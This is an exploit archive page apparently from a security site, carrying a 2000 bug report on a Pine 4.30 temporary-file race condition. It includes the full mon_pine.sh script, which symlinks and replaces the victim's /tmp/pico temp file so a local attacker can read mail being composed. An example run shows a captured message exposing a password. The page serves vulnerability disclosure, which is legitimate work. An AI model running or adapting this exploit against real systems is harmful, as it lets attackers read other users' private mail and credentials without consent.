mon_pine.sh

mon_pine.sh: Posted Dec 12, 2000; Authored by JW Oh | Site hacksware.com; Pine v4.30 and below allows outgoing mail to be hijacked if the alternate editor is enabled. Exploit script included.; tags | exploit; SHA-256 | a697070970654ece18a16dfe44b4f7ffcf5b38cb5159bafae4e725f245de46ca; Download | Favorite | View

mon_pine.sh



   Hacksware Bug Report

1. Name: Pine temporary file hijacking vulnerability
2. Release Date: 2000.12.11
3. Affected Application:
   Pine Version 4.30(or maybe other versions)
4. Author: mat@hacksware.com
5. Type: Local Race Condition
6. Explanation
 If pine setting is like following:
  [x]  enable-alternate-editor-cmd
  [x]  enable-alternate-editor-implicitly
  editor                   = /usr/bin/vi
 pine creates it's temporary in in /tmp directory with names like /tmp/pico.007292(where 7292 is the pid of pine process running).

 You can simply symlink this file(/tmp/pico.<pid>) to another file that doesn't exist.
 When victim is editing message victim editor vi follows symlinks and creates another file.
 By removing this symlink and creating your own temporary file and making it writable to victim, you can hijack his mail message.

7. Exploits

--------------------mon_pine.sh start--------------------------------
#!/bin/sh
# Grab local pine messages
# Usage: ./mon_pine.sh <pid of pine process>
# victim pine must use following settings
#
#  mat@hacksware.com
#  http://hacksware.com
#
# [x]  enable-alternate-editor-cmd
# [x]  enable-alternate-editor-implicitly
# editor                   = /usr/bin/vi
#

PID=$1
PICO_FILE=`printf "/tmp/pico.%.6d" $PID`
TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"`
echo PICO_FILE is $PICO_FILE

#if $PICO_FILE and $TRASHCAN exists, remove them
if test -f $PICO_FILE
then
 rm -f $PICO_FILE
fi
if test -f $TRASHCAN
then
 rm -f $TRASHCAN
fi

ln -s $TRASHCAN $PICO_FILE
while :
do
 if test -f $TRASHCAN
 then
  break
 fi
done

echo Victim is Editing Pine Message
rm -f $PICO_FILE
echo We replace temporary file
touch $PICO_FILE
chmod 777 $PICO_FILE
echo "Get the message from "$PICO_FILE
echo "^C to break tailer"
tail -f $PICO_FILE
--------------------mon_pine.sh end  --------------------------------

8. Example

[mat@overheaven /tmp]$ ps -ax|grep pine|grep -v grep
 7292 pts/1    S      0:22 pine
[mat@overheaven /tmp]$ sh mon_pine.sh 7292
PICO_FILE is /tmp/pico.007292

... wait for victim to compose mail....

Victim is Editing Mail
We replace temporary file
Get the message from /tmp/pico.007292
^C to break tailer

Hello...

Your new password is "greenbee"

Don't let anyone know this...
Thanks..



-- 
=================================================
|               mat@hacksware.com               |
|             http://hacksware.com              |
=================================================

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

mon_pine.sh

mon_pine.sh

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

mon_pine.sh

Share This

mon_pine.sh

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems